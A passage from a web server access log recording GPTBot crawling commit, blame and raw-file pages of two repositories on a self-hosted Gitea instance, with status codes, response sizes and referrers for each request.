Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" +[17/Feb/2026:13:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10905] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10906] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" +[17/Feb/2026:13:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" +[17/Feb/2026:13:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11154] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" +[17/Feb/2026:13:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" +[17/Feb/2026:13:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" +[17/Feb/2026:13:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11154] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" +[17/Feb/2026:13:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" +[17/Feb/2026:13:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11153] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" +[17/Feb/2026:13:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10934] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10904] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10886] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10899] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10927] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10931] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10856] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10932] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 19862] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 226072] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15515] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 193781] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15458] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 18030] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 19842] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 193815] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18299] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 18298] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" +[17/Feb/2026:13:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 10757] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" +[17/Feb/2026:13:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" +[17/Feb/2026:13:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 20169] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 174875] [Gzip 16.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 19863] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" +[17/Feb/2026:13:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 226089] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 20165] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15513] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 196577] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11476] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:13:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9504] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:13:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 558459] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" +[17/Feb/2026:13:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27636] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 20170] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?show-outdated=&style=split&whitespace=ignore-all" +[17/Feb/2026:13:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" [Client 74.7.227.38] [Length 14511] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" [Client 74.7.227.38] [Length 14508] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" [Client 74.7.227.38] [Length 12792] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:44:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:13:44:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" +[17/Feb/2026:13:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10282] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 11046] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 11672] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 